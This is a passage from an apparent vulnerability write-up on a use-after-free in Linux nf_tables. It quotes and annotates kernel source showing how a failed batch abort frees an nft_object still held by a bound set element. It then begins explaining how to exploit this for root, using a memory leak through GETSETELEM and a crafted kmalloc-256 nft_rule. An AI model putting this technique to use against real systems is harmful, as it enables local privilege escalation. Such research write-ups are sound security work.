        <span class="n">list_for_each_entry_reverse</span><span class="p">(</span><span class="n">trans</span><span class="p">,</span> <span class="o">&amp;</span><span class="n">nft_net</span><span class="o">-&gt;</span><span class="n">commit_list</span><span class="p">,</span> <span class="n">list</span><span class="p">)</span> <span class="p">{</span>   <span class="o">&lt;---</span> <span class="p">[</span><span class="mi">3</span><span class="p">]</span>
                <span class="k">switch</span> <span class="p">(</span><span class="n">trans</span><span class="o">-&gt;</span><span class="n">msg_type</span><span class="p">)</span> <span class="p">{</span>
                <span class="k">case</span> <span class="n">NFT_MSG_NEWSET</span><span class="p">:</span>
                        <span class="k">if</span> <span class="p">(</span><span class="n">nft_trans_set</span><span class="p">(</span><span class="n">trans</span><span class="p">)</span> <span class="o">==</span> <span class="n">set</span><span class="p">)</span>
                                <span class="n">nft_trans_set_bound</span><span class="p">(</span><span class="n">trans</span><span class="p">)</span> <span class="o">=</span> <span class="nb">true</span><span class="p">;</span>
                        <span class="k">break</span><span class="p">;</span>
                <span class="k">case</span> <span class="n">NFT_MSG_NEWSETELEM</span><span class="p">:</span>
                        <span class="k">if</span> <span class="p">(</span><span class="n">nft_trans_elem_set</span><span class="p">(</span><span class="n">trans</span><span class="p">)</span> <span class="o">==</span> <span class="n">set</span><span class="p">)</span>
                                <span class="n">nft_trans_elem_set_bound</span><span class="p">(</span><span class="n">trans</span><span class="p">)</span> <span class="o">=</span> <span class="nb">true</span><span class="p">;</span>    <span class="o">&lt;---</span> <span class="p">[</span><span class="mi">4</span><span class="p">]</span>
                        <span class="k">break</span><span class="p">;</span>
                <span class="p">}</span>
        <span class="p">}</span>
<span class="p">}</span>

<span class="k">static</span> <span class="kr">inline</span> <span class="n">bool</span> <span class="nf">nft_set_is_anonymous</span><span class="p">(</span><span class="k">const</span> <span class="k">struct</span> <span class="n">nft_set</span> <span class="o">*</span><span class="n">set</span><span class="p">)</span>
<span class="p">{</span>
        <span class="k">return</span> <span class="n">set</span><span class="o">-&gt;</span><span class="n">flags</span> <span class="o">&amp;</span> <span class="n">NFT_SET_ANONYMOUS</span><span class="p">;</span>
<span class="p">}</span>

<span class="cp">#define nft_trans_elem_set_bound(trans) \
        (((struct nft_trans_elem *)trans-&gt;data)-&gt;bound)
</span></code></pre></div></div>

<p>After <code class="language-plaintext highlighter-rouge">nft_expr_init</code> returns, execution flow is back in <code class="language-plaintext highlighter-rouge">nft_set_elem_expr_alloc</code> where the function will bail out [1] with an error because the <code class="language-plaintext highlighter-rouge">objref_map</code> expression we tried to create does not have the <code class="language-plaintext highlighter-rouge">NFT_EXPR_STATEFUL</code> flag. Even though <code class="language-plaintext highlighter-rouge">nft_expr_destroy</code> [2] is invoked, it eventually calls <code class="language-plaintext highlighter-rouge">nft_objref_map_destroy-&gt;nf_tables_destroy_set</code> as this is an <code class="language-plaintext highlighter-rouge">objref_map</code> expression, and does not destroy the set as the set has a binding [3].</p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">struct</span> <span class="n">nft_expr</span> <span class="o">*</span><span class="nf">nft_set_elem_expr_alloc</span><span class="p">(</span><span class="k">const</span> <span class="k">struct</span> <span class="n">nft_ctx</span> <span class="o">*</span><span class="n">ctx</span><span class="p">,</span>
                                         <span class="k">const</span> <span class="k">struct</span> <span class="n">nft_set</span> <span class="o">*</span><span class="n">set</span><span class="p">,</span>
                                         <span class="k">const</span> <span class="k">struct</span> <span class="n">nlattr</span> <span class="o">*</span><span class="n">attr</span><span class="p">)</span>
<span class="p">{</span>
        <span class="k">struct</span> <span class="n">nft_expr</span> <span class="o">*</span><span class="n">expr</span><span class="p">;</span>
        <span class="kt">int</span> <span class="n">err</span><span class="p">;</span>

        <span class="n">expr</span> <span class="o">=</span> <span class="n">nft_expr_init</span><span class="p">(</span><span class="n">ctx</span><span class="p">,</span> <span class="n">attr</span><span class="p">);</span>
        <span class="k">if</span> <span class="p">(</span><span class="n">IS_ERR</span><span class="p">(</span><span class="n">expr</span><span class="p">))</span>
                <span class="k">return</span> <span class="n">expr</span><span class="p">;</span>

        <span class="n">err</span> <span class="o">=</span> <span class="o">-</span><span class="n">EOPNOTSUPP</span><span class="p">;</span>
        <span class="k">if</span> <span class="p">(</span><span class="o">!</span><span class="p">(</span><span class="n">expr</span><span class="o">-&gt;</span><span class="n">ops</span><span class="o">-&gt;</span><span class="n">type</span><span class="o">-&gt;</span><span class="n">flags</span> <span class="o">&amp;</span> <span class="n">NFT_EXPR_STATEFUL</span><span class="p">))</span>
                <span class="k">goto</span> <span class="n">err_set_elem_expr</span><span class="p">;</span>    <span class="o">&lt;---</span> <span class="p">[</span><span class="mi">1</span><span class="p">]</span>

        <span class="k">if</span> <span class="p">(</span><span class="n">expr</span><span class="o">-&gt;</span><span class="n">ops</span><span class="o">-&gt;</span><span class="n">type</span><span class="o">-&gt;</span><span class="n">flags</span> <span class="o">&amp;</span> <span class="n">NFT_EXPR_GC</span><span class="p">)</span> <span class="p">{</span>
                <span class="k">if</span> <span class="p">(</span><span class="n">set</span><span class="o">-&gt;</span><span class="n">flags</span> <span class="o">&amp;</span> <span class="n">NFT_SET_TIMEOUT</span><span class="p">)</span>
                        <span class="k">goto</span> <span class="n">err_set_elem_expr</span><span class="p">;</span>
                <span class="k">if</span> <span class="p">(</span><span class="o">!</span><span class="n">set</span><span class="o">-&gt;</span><span class="n">ops</span><span class="o">-&gt;</span><span class="n">gc_init</span><span class="p">)</span>
                        <span class="k">goto</span> <span class="n">err_set_elem_expr</span><span class="p">;</span>
                <span class="n">set</span><span class="o">-&gt;</span><span class="n">ops</span><span class="o">-&gt;</span><span class="n">gc_init</span><span class="p">(</span><span class="n">set</span><span class="p">);</span>
        <span class="p">}</span>

        <span class="k">return</span> <span class="n">expr</span><span class="p">;</span>

<span class="nl">err_set_elem_expr:</span>
        <span class="n">nft_expr_destroy</span><span class="p">(</span><span class="n">ctx</span><span class="p">,</span> <span class="n">expr</span><span class="p">);</span>    <span class="o">&lt;---</span> <span class="p">[</span><span class="mi">2</span><span class="p">]</span>
        <span class="k">return</span> <span class="n">ERR_PTR</span><span class="p">(</span><span class="n">err</span><span class="p">);</span>
<span class="p">}</span>

<span class="kt">void</span> <span class="nf">nf_tables_destroy_set</span><span class="p">(</span><span class="k">const</span> <span class="k">struct</span> <span class="n">nft_ctx</span> <span class="o">*</span><span class="n">ctx</span><span class="p">,</span> <span class="k">struct</span> <span class="n">nft_set</span> <span class="o">*</span><span class="n">set</span><span class="p">)</span>
<span class="p">{</span>
	<span class="k">if</span> <span class="p">(</span><span class="n">list_empty</span><span class="p">(</span><span class="o">&amp;</span><span class="n">set</span><span class="o">-&gt;</span><span class="n">bindings</span><span class="p">)</span> <span class="o">&amp;&amp;</span> <span class="n">nft_set_is_anonymous</span><span class="p">(</span><span class="n">set</span><span class="p">))</span>   <span class="o">&lt;---</span> <span class="p">[</span><span class="mi">3</span><span class="p">]</span>
		<span class="n">nft_set_destroy</span><span class="p">(</span><span class="n">ctx</span><span class="p">,</span> <span class="n">set</span><span class="p">);</span>
<span class="p">}</span>
</code></pre></div></div>

<p>Ultimately, the failure returns back to <code class="language-plaintext highlighter-rouge">nfnetlink_rcv_batch</code>, and since processing of the batch failed somewhere along the way, <code class="language-plaintext highlighter-rouge">nf_tables_abort</code> is called (detailed at the start of this section). <code class="language-plaintext highlighter-rouge">nf_tables_abort</code> calls <code class="language-plaintext highlighter-rouge">__nf_tables_abort</code>, which processes every <code class="language-plaintext highlighter-rouge">nft_trans</code> in the <code class="language-plaintext highlighter-rouge">nft_net-&gt;commit_list</code> in reverse order. At this point there are two <code class="language-plaintext highlighter-rouge">nft_trans</code> entries: one from creating the new <code class="language-plaintext highlighter-rouge">nft_object</code>, and one from creating the <code class="language-plaintext highlighter-rouge">nft_set_elem</code> that references it. The <code class="language-plaintext highlighter-rouge">nft_set_elem</code> entry is therefore processed first, then the <code class="language-plaintext highlighter-rouge">nft_object</code> entry. Because the <code class="language-plaintext highlighter-rouge">nft_set_elem</code> was bound earlier, its <code class="language-plaintext highlighter-rouge">nft_trans</code> is simply destroyed [1][1A] with no further processing. The <code class="language-plaintext highlighter-rouge">nft_object</code> is not an existing object being updated, so its handler just decrements the use count of the table the object belongs to and calls <code class="language-plaintext highlighter-rouge">nft_obj_del</code> [2]. <code class="language-plaintext highlighter-rouge">nft_obj_del</code> deletes the object from the <code class="language-plaintext highlighter-rouge">rhltable</code> that it belongs to and deletes the reference to the object from an RCU linked list that it belongs to [2A], but does not free the object. Finally, <code class="language-plaintext highlighter-rouge">nf_tables_abort_release</code> [3] is called for every <code class="language-plaintext highlighter-rouge">nft_trans</code> still remaining in the <code class="language-plaintext highlighter-rouge">nft_net-&gt;commit_list</code>. There is only one <code class="language-plaintext highlighter-rouge">nft_trans</code> remaining in the commit list and this is the one with the <code class="language-plaintext highlighter-rouge">nft_object</code>.</p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">static</span> <span class="kt">int</span> <span class="nf">__nf_tables_abort</span><span class="p">(</span><span class="k">struct</span> <span class="n">net</span> <span class="o">*</span><span class="n">net</span><span class="p">,</span> <span class="k">enum</span> <span class="n">nfnl_abort_action</span> <span class="n">action</span><span class="p">)</span>
<span class="p">{</span>
        <span class="p">...</span>
        <span class="n">list_for_each_entry_safe_reverse</span><span class="p">(</span><span class="n">trans</span><span class="p">,</span> <span class="n">next</span><span class="p">,</span> <span class="o">&amp;</span><span class="n">nft_net</span><span class="o">-&gt;</span><span class="n">commit_list</span><span class="p">,</span>
                                         <span class="n">list</span><span class="p">)</span> <span class="p">{</span>
                <span class="k">switch</span> <span class="p">(</span><span class="n">trans</span><span class="o">-&gt;</span><span class="n">msg_type</span><span class="p">)</span> <span class="p">{</span>
                <span class="k">case</span> <span class="n">NFT_MSG_NEWSETELEM</span><span class="p">:</span>
                        <span class="k">if</span> <span class="p">(</span><span class="n">nft_trans_elem_set_bound</span><span class="p">(</span><span class="n">trans</span><span class="p">))</span> <span class="p">{</span>
                                <span class="n">nft_trans_destroy</span><span class="p">(</span><span class="n">trans</span><span class="p">);</span>    <span class="o">&lt;---</span> <span class="p">[</span><span class="mi">1</span><span class="p">]</span>
                                <span class="k">break</span><span class="p">;</span>
                        <span class="p">}</span>
                        <span class="n">te</span> <span class="o">=</span> <span class="p">(</span><span class="k">struct</span> <span class="n">nft_trans_elem</span> <span class="o">*</span><span class="p">)</span><span class="n">trans</span><span class="o">-&gt;</span><span class="n">data</span><span class="p">;</span>
                        <span class="n">nft_setelem_remove</span><span class="p">(</span><span class="n">net</span><span class="p">,</span> <span class="n">te</span><span class="o">-&gt;</span><span class="n">set</span><span class="p">,</span> <span class="o">&amp;</span><span class="n">te</span><span class="o">-&gt;</span><span class="n">elem</span><span class="p">);</span>
                        <span class="k">if</span> <span class="p">(</span><span class="o">!</span><span class="n">nft_setelem_is_catchall</span><span class="p">(</span><span class="n">te</span><span class="o">-&gt;</span><span class="n">set</span><span class="p">,</span> <span class="o">&amp;</span><span class="n">te</span><span class="o">-&gt;</span><span class="n">elem</span><span class="p">))</span>
                                <span class="n">atomic_dec</span><span class="p">(</span><span class="o">&amp;</span><span class="n">te</span><span class="o">-&gt;</span><span class="n">set</span><span class="o">-&gt;</span><span class="n">nelems</span><span class="p">);</span>
                        <span class="k">break</span><span class="p">;</span>
                <span class="p">...</span>
                <span class="k">case</span> <span class="n">NFT_MSG_NEWOBJ</span><span class="p">:</span>
                        <span class="k">if</span> <span class="p">(</span><span class="n">nft_trans_obj_update</span><span class="p">(</span><span class="n">trans</span><span class="p">))</span> <span class="p">{</span>
                                <span class="n">nft_obj_destroy</span><span class="p">(</span><span class="o">&amp;</span><span class="n">trans</span><span class="o">-&gt;</span><span class="n">ctx</span><span class="p">,</span>
                                                <span class="n">nft_trans_obj_newobj</span><span class="p">(</span><span class="n">trans</span><span class="p">));</span>
                                <span class="n">nft_trans_destroy</span><span class="p">(</span><span class="n">trans</span><span class="p">);</span>
                        <span class="p">}</span> <span class="k">else</span> <span class="p">{</span>
                                <span class="n">trans</span><span class="o">-&gt;</span><span class="n">ctx</span><span class="p">.</span><span class="n">table</span><span class="o">-&gt;</span><span class="n">use</span><span class="o">--</span><span class="p">;</span>    <span class="o">&lt;---</span> <span class="p">[</span><span class="mi">2</span><span class="p">]</span>
                                <span class="n">nft_obj_del</span><span class="p">(</span><span class="n">nft_trans_obj</span><span class="p">(</span><span class="n">trans</span><span class="p">));</span>
                        <span class="p">}</span>
                        <span class="k">break</span><span class="p">;</span>
                <span class="p">...</span>
                <span class="p">}</span>
        <span class="p">}</span>
        <span class="n">list_for_each_entry_safe_reverse</span><span class="p">(</span><span class="n">trans</span><span class="p">,</span> <span class="n">next</span><span class="p">,</span>
                                         <span class="o">&amp;</span><span class="n">nft_net</span><span class="o">-&gt;</span><span class="n">commit_list</span><span class="p">,</span> <span class="n">list</span><span class="p">)</span> <span class="p">{</span>
                <span class="n">list_del</span><span class="p">(</span><span class="o">&amp;</span><span class="n">trans</span><span class="o">-&gt;</span><span class="n">list</span><span class="p">);</span>
                <span class="n">nf_tables_abort_release</span><span class="p">(</span><span class="n">trans</span><span class="p">);</span>    <span class="o">&lt;---</span> <span class="p">[</span><span class="mi">3</span><span class="p">]</span>
        <span class="p">}</span>
         <span class="p">...</span>
        <span class="k">return</span> <span class="mi">0</span><span class="p">;</span>
<span class="p">}</span>

<span class="k">static</span> <span class="kt">void</span> <span class="nf">nft_obj_del</span><span class="p">(</span><span class="k">struct</span> <span class="n">nft_object</span> <span class="o">*</span><span class="n">obj</span><span class="p">)</span>   <span class="o">&lt;---</span> <span class="p">[</span><span class="mi">2</span><span class="n">A</span><span class="p">]</span>
<span class="p">{</span>
        <span class="n">rhltable_remove</span><span class="p">(</span><span class="o">&amp;</span><span class="n">nft_objname_ht</span><span class="p">,</span> <span class="o">&amp;</span><span class="n">obj</span><span class="o">-&gt;</span><span class="n">rhlhead</span><span class="p">,</span> <span class="n">nft_objname_ht_params</span><span class="p">);</span>
        <span class="n">list_del_rcu</span><span class="p">(</span><span class="o">&amp;</span><span class="n">obj</span><span class="o">-&gt;</span><span class="n">list</span><span class="p">);</span>
<span class="err">}</span>

<span class="k">static</span> <span class="kt">void</span> <span class="nf">nft_trans_destroy</span><span class="p">(</span><span class="k">struct</span> <span class="n">nft_trans</span> <span class="o">*</span><span class="n">trans</span><span class="p">)</span>    <span class="o">&lt;---</span> <span class="p">[</span><span class="mi">1</span><span class="n">A</span><span class="p">]</span>
<span class="p">{</span>
        <span class="n">list_del</span><span class="p">(</span><span class="o">&amp;</span><span class="n">trans</span><span class="o">-&gt;</span><span class="n">list</span><span class="p">);</span>
        <span class="n">kfree</span><span class="p">(</span><span class="n">trans</span><span class="p">);</span>
<span class="err">}</span>
</code></pre></div></div>
<p>In <code class="language-plaintext highlighter-rouge">nf_tables_abort_release</code>, <code class="language-plaintext highlighter-rouge">nft_obj_destroy</code> is called on the <code class="language-plaintext highlighter-rouge">nft_object</code> [1] that the <code class="language-plaintext highlighter-rouge">nft_trans</code> is referencing, which frees the object [2]. However, the <code class="language-plaintext highlighter-rouge">nft_set_elem</code> holding the pointer to the object’s location in memory was not destroyed since the <code class="language-plaintext highlighter-rouge">nft_trans</code> referencing it was destroyed due to the set elem being bound. This means that there is now a use-after-free condition that we can leverage for further exploitation.</p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">static</span> <span class="kt">void</span> <span class="nf">nf_tables_abort_release</span><span class="p">(</span><span class="k">struct</span> <span class="n">nft_trans</span> <span class="o">*</span><span class="n">trans</span><span class="p">)</span>
<span class="p">{</span>
        <span class="k">switch</span> <span class="p">(</span><span class="n">trans</span><span class="o">-&gt;</span><span class="n">msg_type</span><span class="p">)</span> <span class="p">{</span>
        <span class="p">...</span>
        <span class="k">case</span> <span class="n">NFT_MSG_NEWOBJ</span><span class="p">:</span>
                <span class="n">nft_obj_destroy</span><span class="p">(</span><span class="o">&amp;</span><span class="n">trans</span><span class="o">-&gt;</span><span class="n">ctx</span><span class="p">,</span> <span class="n">nft_trans_obj</span><span class="p">(</span><span class="n">trans</span><span class="p">));</span>     <span class="o">&lt;---</span> <span class="p">[</span><span class="mi">1</span><span class="p">]</span>
                <span class="k">break</span><span class="p">;</span>
        <span class="p">...</span>
        <span class="p">}</span>
        <span class="n">kfree</span><span class="p">(</span><span class="n">trans</span><span class="p">);</span>
<span class="p">}</span>

<span class="cp">#define nft_trans_obj(trans)    \
        (((struct nft_trans_obj *)trans-&gt;data)-&gt;obj)
</span>
<span class="k">static</span> <span class="kt">void</span> <span class="nf">nft_obj_destroy</span><span class="p">(</span><span class="k">const</span> <span class="k">struct</span> <span class="n">nft_ctx</span> <span class="o">*</span><span class="n">ctx</span><span class="p">,</span> <span class="k">struct</span> <span class="n">nft_object</span> <span class="o">*</span><span class="n">obj</span><span class="p">)</span>
<span class="p">{</span>
        <span class="k">if</span> <span class="p">(</span><span class="n">obj</span><span class="o">-&gt;</span><span class="n">ops</span><span class="o">-&gt;</span><span class="n">destroy</span><span class="p">)</span>
                <span class="n">obj</span><span class="o">-&gt;</span><span class="n">ops</span><span class="o">-&gt;</span><span class="n">destroy</span><span class="p">(</span><span class="n">ctx</span><span class="p">,</span> <span class="n">obj</span><span class="p">);</span>

        <span class="n">module_put</span><span class="p">(</span><span class="n">obj</span><span class="o">-&gt;</span><span class="n">ops</span><span class="o">-&gt;</span><span class="n">type</span><span class="o">-&gt;</span><span class="n">owner</span><span class="p">);</span>
        <span class="n">kfree</span><span class="p">(</span><span class="n">obj</span><span class="o">-&gt;</span><span class="n">key</span><span class="p">.</span><span class="n">name</span><span class="p">);</span>
        <span class="n">kfree</span><span class="p">(</span><span class="n">obj</span><span class="o">-&gt;</span><span class="n">udata</span><span class="p">);</span>
        <span class="n">kfree</span><span class="p">(</span><span class="n">obj</span><span class="p">);</span>    <span class="o">&lt;---</span> <span class="p">[</span><span class="mi">2</span><span class="p">]</span>
<span class="p">}</span>
</code></pre></div></div>

<h1 id="exploitation">Exploitation</h1>

<p>This section will detail how the use-after-free can be leveraged to escalate privileges from an unprivileged user to root.</p>

<p>The freed <code class="language-plaintext highlighter-rouge">nft_object</code> is referenced from an <code class="language-plaintext highlighter-rouge">nft_set_elem</code> and that means performing leaks on the freed memory is limited to the use of <code class="language-plaintext highlighter-rouge">nf_tables_getsetelem</code>, which we can trigger by sending a netlink message of type <code class="language-plaintext highlighter-rouge">NFT_MSG_GETSETELEM</code>. This function eventually calls <code class="language-plaintext highlighter-rouge">nf_tables_fill_setelem</code> that will perform a memcpy of whatever the <code class="language-plaintext highlighter-rouge">nft_object</code>’s <code class="language-plaintext highlighter-rouge">key.name</code> member is pointing to [1] and return that to the user.</p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">static</span> <span class="kt">int</span> <span class="nf">nf_tables_getsetelem</span><span class="p">(</span><span class="k">struct</span> <span class="n">sk_buff</span> <span class="o">*</span><span class="n">skb</span><span class="p">,</span>
                                <span class="k">const</span> <span class="k">struct</span> <span class="n">nfnl_info</span> <span class="o">*</span><span class="n">info</span><span class="p">,</span>
                                <span class="k">const</span> <span class="k">struct</span> <span class="n">nlattr</span> <span class="o">*</span> <span class="k">const</span> <span class="n">nla</span><span class="p">[])</span>
<span class="p">{</span>
        <span class="p">...</span>
        <span class="n">nla_for_each_nested</span><span class="p">(</span><span class="n">attr</span><span class="p">,</span> <span class="n">nla</span><span class="p">[</span><span class="n">NFTA_SET_ELEM_LIST_ELEMENTS</span><span class="p">],</span> <span class="n">rem</span><span class="p">)</span> <span class="p">{</span>
                <span class="n">err</span> <span class="o">=</span> <span class="n">nft_get_set_elem</span><span class="p">(</span><span class="o">&amp;</span><span class="n">ctx</span><span class="p">,</span> <span class="n">set</span><span class="p">,</span> <span class="n">attr</span><span class="p">);</span>
                <span class="k">if</span> <span class="p">(</span><span class="n">err</span> <span class="o">&lt;</span> <span class="mi">0</span><span class="p">)</span>
                        <span class="k">break</span><span class="p">;</span>
        <span class="p">}</span>
        <span class="p">...</span>
<span class="p">}</span>

<span class="k">static</span> <span class="kt">int</span> <span class="nf">nf_tables_fill_setelem</span><span class="p">(</span><span class="k">struct</span> <span class="n">sk_buff</span> <span class="o">*</span><span class="n">skb</span><span class="p">,</span>
                                  <span class="k">const</span> <span class="k">struct</span> <span class="n">nft_set</span> <span class="o">*</span><span class="n">set</span><span class="p">,</span>
                                  <span class="k">const</span> <span class="k">struct</span> <span class="n">nft_set_elem</span> <span class="o">*</span><span class="n">elem</span><span class="p">)</span>
<span class="p">{</span>
        <span class="k">const</span> <span class="k">struct</span> <span class="n">nft_set_ext</span> <span class="o">*</span><span class="n">ext</span> <span class="o">=</span> <span class="n">nft_set_elem_ext</span><span class="p">(</span><span class="n">set</span><span class="p">,</span> <span class="n">elem</span><span class="o">-&gt;</span><span class="n">priv</span><span class="p">);</span>
        <span class="p">...</span>
        <span class="k">if</span> <span class="p">(</span><span class="n">nft_set_ext_exists</span><span class="p">(</span><span class="n">ext</span><span class="p">,</span> <span class="n">NFT_SET_EXT_OBJREF</span><span class="p">)</span> <span class="o">&amp;&amp;</span>
            <span class="n">nla_put_string</span><span class="p">(</span><span class="n">skb</span><span class="p">,</span> <span class="n">NFTA_SET_ELEM_OBJREF</span><span class="p">,</span>
                           <span class="p">(</span><span class="o">*</span><span class="n">nft_set_ext_obj</span><span class="p">(</span><span class="n">ext</span><span class="p">))</span><span class="o">-&gt;</span><span class="n">key</span><span class="p">.</span><span class="n">name</span><span class="p">)</span> <span class="o">&lt;</span> <span class="mi">0</span><span class="p">)</span>
                <span class="k">goto</span> <span class="n">nla_put_failure</span><span class="p">;</span>
        <span class="p">...</span>
<span class="p">}</span>

<span class="k">static</span> <span class="kr">inline</span> <span class="kt">int</span> <span class="nf">nla_put_string</span><span class="p">(</span><span class="k">struct</span> <span class="n">sk_buff</span> <span class="o">*</span><span class="n">skb</span><span class="p">,</span> <span class="kt">int</span> <span class="n">attrtype</span><span class="p">,</span>
                                 <span class="k">const</span> <span class="kt">char</span> <span class="o">*</span><span class="n">str</span><span class="p">)</span>
<span class="p">{</span>
        <span class="k">return</span> <span class="n">nla_put</span><span class="p">(</span><span class="n">skb</span><span class="p">,</span> <span class="n">attrtype</span><span class="p">,</span> <span class="n">strlen</span><span class="p">(</span><span class="n">str</span><span class="p">)</span> <span class="o">+</span> <span class="mi">1</span><span class="p">,</span> <span class="n">str</span><span class="p">);</span>
<span class="p">}</span>

<span class="kt">int</span> <span class="nf">nla_put</span><span class="p">(</span><span class="k">struct</span> <span class="n">sk_buff</span> <span class="o">*</span><span class="n">skb</span><span class="p">,</span> <span class="kt">int</span> <span class="n">attrtype</span><span class="p">,</span> <span class="kt">int</span> <span class="n">attrlen</span><span class="p">,</span> <span class="k">const</span> <span class="kt">void</span> <span class="o">*</span><span class="n">data</span><span class="p">)</span>
<span class="p">{</span>
        <span class="k">if</span> <span class="p">(</span><span class="n">unlikely</span><span class="p">(</span><span class="n">skb_tailroom</span><span class="p">(</span><span class="n">skb</span><span class="p">)</span> <span class="o">&lt;</span> <span class="n">nla_total_size</span><span class="p">(</span><span class="n">attrlen</span><span class="p">)))</span>
                <span class="k">return</span> <span class="o">-</span><span class="n">EMSGSIZE</span><span class="p">;</span>

        <span class="n">__nla_put</span><span class="p">(</span><span class="n">skb</span><span class="p">,</span> <span class="n">attrtype</span><span class="p">,</span> <span class="n">attrlen</span><span class="p">,</span> <span class="n">data</span><span class="p">);</span>
        <span class="k">return</span> <span class="mi">0</span><span class="p">;</span>
<span class="p">}</span>

<span class="kt">void</span> <span class="nf">__nla_put</span><span class="p">(</span><span class="k">struct</span> <span class="n">sk_buff</span> <span class="o">*</span><span class="n">skb</span><span class="p">,</span> <span class="kt">int</span> <span class="n">attrtype</span><span class="p">,</span> <span class="kt">int</span> <span class="n">attrlen</span><span class="p">,</span>
               <span class="k">const</span> <span class="kt">void</span> <span class="o">*</span><span class="n">data</span><span class="p">)</span>
<span class="p">{</span>
        <span class="k">struct</span> <span class="n">nlattr</span> <span class="o">*</span><span class="n">nla</span><span class="p">;</span>

        <span class="n">nla</span> <span class="o">=</span> <span class="n">__nla_reserve</span><span class="p">(</span><span class="n">skb</span><span class="p">,</span> <span class="n">attrtype</span><span class="p">,</span> <span class="n">attrlen</span><span class="p">);</span>
        <span class="n">memcpy</span><span class="p">(</span><span class="n">nla_data</span><span class="p">(</span><span class="n">nla</span><span class="p">),</span> <span class="n">data</span><span class="p">,</span> <span class="n">attrlen</span><span class="p">);</span>    <span class="o">&lt;---</span> <span class="p">[</span><span class="mi">1</span><span class="p">]</span>
<span class="p">}</span>
</code></pre></div></div>

<p>So when another entity gets allocated into the freed memory location, whatever is at the offset of the <code class="language-plaintext highlighter-rouge">nft_object</code>’s <code class="language-plaintext highlighter-rouge">key.name</code> member is treated as the source pointer for the memcpy, leaking whatever data lies at that location. This happens to be offset 32 of the <code class="language-plaintext highlighter-rouge">nft_object</code> and the <code class="language-plaintext highlighter-rouge">nft_object</code> is allocated on the kmalloc-256 slab.</p>

<h2 id="leaking-the-address-of-an-nft_set">Leaking the address of an <code class="language-plaintext highlighter-rouge">nft_set</code></h2>

<p>A candidate to leak an initial memory address from a heap object is to craft a specific <code class="language-plaintext highlighter-rouge">nft_rule</code> that is large enough to be allocated with kmalloc-256. An <code class="language-plaintext highlighter-rouge">nft_rule</code> can contain multiple <code class="language-plaintext highlighter-rouge">nft_expr</code> that can be specified when creating the rule. The size of an <code class="language-plaintext highlighter-rouge">nft_rule</code> is 24 bytes (not counting the expressions and userdata it contains) and has the following structure.</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>+ ------------------------------------------------------------------------------------ +
| Rule attributes (24 bytes) | nft_expr #1 | nft_expr #2 | other exprs | Rule USERDATA |
+ ------------------------------------------------------------------------------------ +
</code></pre></div></div>

<p>Since offset 32 from the start of the rule is treated as a source pointer we can leak data from, this means offset 8 from the start of the first <code class="language-plaintext highlighter-rouge">nft_expr</code> of the rule is used as the source pointer. This is the data member of the expression.</p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">struct</span> <span class="n">nft_expr</span> <span class="p">{</span>
        <span class="k">const</span> <span class="k">struct</span> <span class="n">nft_expr_ops</span> <span class="o">*</span><span class="n">ops</span><span class="p">;</span>
        <span class="kt">unsigned</span> <span class="kt">char</span>           <span class="n">data</span><span class="p">[]</span>
                <span class="n">__attribute__</span><span class="p">((</span><span class="n">aligned</span><span class="p">(</span><span class="n">__alignof__</span><span class="p">(</span><span class="n">u64</span><span class="p">))));</span>
<span class="p">};</span>
</code></pre></div></div>

<p>If the first <code class="language-plaintext highlighter-rouge">nft_expr</code> added to the rule is an <code class="language-plaintext highlighter-rouge">objref_map</code> expr, the data member is <code class="language-plaintext highlighter-rouge">struct nft_objref_map</code>. At the start of this is a pointer to an <code class="language-plaintext highlighter-rouge">nft_set</code> [1]. So when the leak is performed, we are leaking whatever is in the <code class="language-plaintext highlighter-rouge">struct list_head</code> [2] at the beginning of the set, which turns out to be a pointer to the next <code class="language-plaintext highlighter-rouge">list_head</code> that is linked (these are just nodes in a linked list of <code class="language-plaintext highlighter-rouge">nft_set</code>s).</p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">struct</span> <span class="n">nft_objref_map</span> <span class="p">{</span>
        <span class="k">struct</span> <span class="n">nft_set</span>          <span class="o">*</span><span class="n">set</span><span class="p">;</span>    <span class="o">&lt;---</span> <span class="p">[</span><span class="mi">1</span><span class="p">]</span>
        <span class="n">u8</span>                      <span class="n">sreg</span><span class="p">;</span>
        <span class="k">struct</span> <span class="n">nft_set_binding</span>  <span class="n">binding</span><span class="p">;</span>
<span class="p">};</span>


<span class="k">struct</span> <span class="n">nft_set</span> <span class="p">{</span>
        <span class="k">struct</span> <span class="n">list_head</span>        <span class="n">list</span><span class="p">;</span>    <span class="o">&lt;---</span> <span class="p">[</span><span class="mi">2</span><span class="p">]</span>
        <span class="k">struct</span> <span class="n">list_head</span>        <span class="n">bindings</span><span class="p">;</span>
        <span class="k">struct</span> <span class="n">nft_table</span>        <span class="o">*</span><span class="n">table</span><span class="p">;</span>
        <span class="n">possible_net_t</span>          <span class="n">net</span><span class="p">;</span>
        <span class="kt">char</span>                    <span class="o">*</span><span class="n">name</span><span class="p">;</span>
        <span class="p">...</span>
        <span class="n">u32</span>                     <span class="n">use</span><span class="p">;</span>
        <span class="n">atomic_t</span>                <span class="n">nelems</span><span class="p">;</span>
        <span class="p">...</span>
        <span class="cm">/* runtime data below here */</span>
        <span class="k">const</span> <span class="k">struct</span> <span class="n">nft_set_ops</span>        <span class="o">*</span><span class="n">ops</span> <span class="n">____cacheline_aligned</span><span class="p">;</span>
        <span class="n">u16</span>                             <span class="n">flags</span><span class="o">:</span><span class="mi">14</span><span class="p">,</span>
                                        <span class="nl">genmask:</span><span class="mi">2</span><span class="p">;</span>
        <span class="n">u8</span>                      <span class="n">klen</span><span class="p">;</span>
        <span class="n">u8</span>                      <span class="n">dlen</span><span class="p">;</span>
        <span class="n">u8</span>                      <span class="n">num_exprs</span><span class="p">;</span>
        <span class="k">struct</span> <span class="n">nft_expr</span>         <span class="o">*</span><span class="n">exprs</span><span class="p">[</span><span class="n">NFT_SET_EXPR_MAX</span><span class="p">];</span>
        <span class="k">struct</span> <span class="n">list_head</span>        <span class="n">catchall_list</span><span class="p">;</span>
        <span class="kt">unsigned</span> <span class="kt">char</span>           <span class="n">data</span><span class="p">[]</span>
